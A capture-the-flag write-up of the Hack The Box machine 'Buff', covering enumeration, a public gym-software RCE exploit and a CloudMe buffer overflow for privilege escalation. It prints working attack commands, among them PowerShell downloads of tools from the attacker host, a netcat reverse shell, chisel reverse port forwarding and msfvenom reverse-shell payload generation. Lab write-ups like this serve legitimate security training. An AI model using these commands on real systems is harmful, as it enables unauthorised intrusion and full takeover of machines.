HTB Writeup - Buff
Hints
- There is something in this box which may not spin up as intended reliably. You’ll be able to get an initial foothold without this thing, but if you get stuck trying to find a path forward, it’s possible the thing you want hasn’t actually started and you’ll need to restart the machine.
- This is a tedious box containing a type of exploit that may break the attack path. If you are certain an exploit should of worked and you have checked all else, restart the machine. It is likely it just failed, potentially broke further exploit attempts and needs to be rebooted.
Enumeration
As usual we start off with an nmap scan:
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: mrb3ns Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
We only have 2 ports open and they aren’t the usual suspects for a web server but it looks like a potentially Windows machine running Apache and PHP.
Exploitation
Browsing the web site reveals the site is made with gym management software v1.0 which has a well published exploit for it, https://www.exploit-db.com/exploits/48506. This is an unauthenticated remote code execution abusing the privilege of uploading arbitrary PHP files to the /upload.php endpoint without authentication.
Execution of this leads us to gaining a pseudo-shell as the shaun user:
python3 exploit.py http://$target:8080/
Escalation from shaun
Running systeminfo allows us to see we are running on a 64 bit Windows host so we can create a better shell using nc64.exe.
We can transfer it onto the host by standing up a web server with:
python3 -m http.server 9091
And downloading it on the host:
powershell -c "Invoke-WebRequest http://10.10.14.3:9091/nc64.exe -outfile nc64.exe"
We trigger a shell using:
C:\xampp\htdocs\gym\upload\nc64.exe -e cmd.exe 10.10.14.3 4444
We catch this shell back in our attack host using rlwrap and nc:
rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.25.107] 49676
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
One of the first thing to do on any box is to determine who we are and our privileges, but the shaun user has nothing of significance. The second thing we do is look for other running services that could be exploitable. Running netstat -ano will show something listening on the localhost only on port 8888:
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 8816
We cannot interact with this service from our attack host directly. We need to somehow get access to port 8888. With Linux and SSH access, this would be done with a port forward rather simply. On Windows, we need to put our own proxy tooling in place to gain access to it. We will use chisel.exe for this. We load it onto the host in the same way we loaded nc64.exe.
powershell -c "Invoke-WebRequest http://10.10.14.3:9091/chisel.exe -outfile chisel.exe"
In our attack host, we can prepare our chisel server to listen on port 8002:
chisel server --reverse --port 8002
Keep in mind, if you have a firewall on your attack host, all these listening ports will need to be opened. I use ufw so I run sudo ufw allow 8002 to enable traffic in via this port. I close it when I’m done. I use kali which is decently secure by default but if you are running quite a few services, you may end up leaking open ports over time and services you don’t need to run. Always remember to clean up and lock the doors when you’re done.
On the target, I can now run the chisel client to open up the local 8888 port:
C:\xampp\htdocs\gym\upload\chisel.exe client 10.10.14.3:8002 R:8888:127.0.0.1:8888
If you now run nmap again targeting 127.0.0.1 instead, you should see an open port on 8888 that leads to the target’s equivalent port:
sudo nmap -sT -v -p8888 -Pn 127.0.0.1
PORT STATE SERVICE
8888/tcp open sun-answerbook
It’s not a web service because going to it in the browser and trying HTTP against it will fail. But looking around the box for executables, and what the PID of the listening process is, we can see the it is a CloudMe application. Running a searchsploit search reveals that many versions of CloudMe are vulnerable to buffer overflows. The top listed exploit has a similar version to the filename on the host: Cloudme_1112.exe.
We can copy this exploit to our local directory, searchsploit -m 48389 and mv 48389.py cloudme_bof.py. It is a really simple buffer overflow and all we need to do is generate a valid payload for it.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 EXITFUNC=thread -b '\x00\x0A\x0D' -f python -v payload
Note that I use mostly the same arguments as the one suggested in the exploit but has also added EXITFUNC=thread. I think this is important to better protect from crashing the box or the process if for whatever reason it fails. Buffer overflows often can cause crashing and if the process is running as NT SYSTEM/Authority, you are not going to be able to restart that service and have another go, unless you reboot the whole machine. Initially, my thought was to use a command exploit and perform a net localgroup Administrators shaun /add command, but I don’t really like doing these kind of exploits for 2 reasons: in HTB, with shared machines, you might be disrupting the experience for other players because they’ll arrive on the machine as the root user and not understand why, and secondly, in a real penetration test, it’s always best to avoid modifying the working environment as much as possible for real users. I.e. get a root shell then create persistence using a custom user, rather than upping the privileges of a real user which may have unintended side effects in the environment.
The shell code generated from msfvenom can then be applied to the PoC above. We can now run the python3 cloudme_bof.py script and catch the shell in a nc listener on our attack host as the NT AUTHORITY/System user.